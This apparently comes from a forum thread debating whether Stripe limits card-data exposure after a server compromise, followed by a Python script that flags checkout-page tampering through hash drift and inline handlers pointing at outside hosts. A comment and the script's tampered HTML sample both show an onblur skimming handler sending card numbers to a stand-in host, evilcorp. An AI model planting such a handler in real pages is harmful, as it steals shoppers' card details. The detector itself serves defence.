
Well, the server holds the checkout page, and the server is hacked. So if the attacker just adds `onblur = getjson(evilcorp.org?cc=value)` to the checkout page, the attacker gets the CC details. No?


Sure, but there are 2 scenarios here.

ONE: You don't use Stripe; you save all your customer info locally and process it some other way.

TWO: You use Stripe and never store any CC info on your server.

THEN: Your server is hacked. In ONE, you lose customer CC info because it is stored on your server. In TWO, you do NOT. Sure, they can redirect you to a fake payment page, but that will get noticed quickly, and the damage will be limited to "phished" users, not your entire user base.


For CC details to be stored, the attacker needs to modify files, though. Other payment gateways just process CC details locally; they are not stored. So either the attacker modifies files to store CC details, or the attacker gets access to log files (but CC details do not belong there either, of course).
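The two comments above agree that, once the server is compromised, the exposure comes from the attacker modifying the checkout page (or its files) rather than from Stripe itself. The check a defender would want is therefore to notice that modification. The following is an added example, not code from the thread or from Stripe: it baselines the deployed checkout HTML by hash and additionally scans inline event-handler attributes for URLs pointing outside an allow list. The sample HTML, the allow list (`shop.example`, `js.stripe.com`) and the tampered copy are constructed for illustration.

```python
"""Detect tampering of a checkout page: hash drift against a baseline and
inline event-handler attributes that reference an external origin."""
import hashlib
import re
from urllib.parse import urlparse

# Constructed sample: the page as deployed (baseline) and a tampered copy
# carrying the kind of onblur exfiltration handler described in the thread.
BASELINE_HTML = """<form id="checkout">
<input name="cc" type="text">
<button type="submit">Pay</button>
</form>
<script src="https://js.stripe.com/v3/"></script>
"""

TAMPERED_HTML = """<form id="checkout">
<input name="cc" type="text" onblur="getjson('https://evilcorp.example/?cc='+this.value)">
<button type="submit">Pay</button>
</form>
<script src="https://js.stripe.com/v3/"></script>
"""

# Assumed allow list: the shop's own host plus Stripe's script host.
ALLOWED_HOSTS = {"shop.example", "js.stripe.com"}

# Matches inline handler attributes such as onblur="..." or onchange='...'
_HANDLER_RE = re.compile(r"""\bon[a-z]+\s*=\s*(?:"([^"]*)"|'([^']*)')""", re.IGNORECASE)
# Extracts absolute http(s) URLs from the handler body.
_URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.IGNORECASE)


def sha256_hex(text: str) -> str:
    """Hex SHA-256 of the page text, used as the integrity baseline."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def external_handler_urls(html: str, allowed_hosts=ALLOWED_HOSTS) -> list:
    """Return URLs found inside inline event handlers whose host is not allow-listed."""
    findings = []
    for m in _HANDLER_RE.finditer(html):
        body = m.group(1) if m.group(1) is not None else m.group(2)
        for url in _URL_RE.findall(body):
            host = urlparse(url).hostname or ""
            if host not in allowed_hosts:
                findings.append(url)
    return findings


def check_page(html: str, baseline_hash: str) -> dict:
    """Combine hash drift and the handler scan into one verdict."""
    drifted = sha256_hex(html) != baseline_hash
    urls = external_handler_urls(html)
    return {
        "hash_drift": drifted,
        "external_handlers": urls,
        "suspicious": drifted or bool(urls),
    }


if __name__ == "__main__":
    baseline = sha256_hex(BASELINE_HTML)
    print(check_page(BASELINE_HTML, baseline))   # no drift, no findings
    print(check_page(TAMPERED_HTML, baseline))   # drift plus the evilcorp URL
```

The hash comparison catches any change to the served page, including ones the handler scan would miss (a modified external script, a changed form action); the handler scan gives a readable reason when the change is of the kind discussed in the thread. In practice the baseline would be taken from the release artefact and the check run against what the web server actually serves, so that a change made on the compromised host shows up even if the source repository is untouched.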

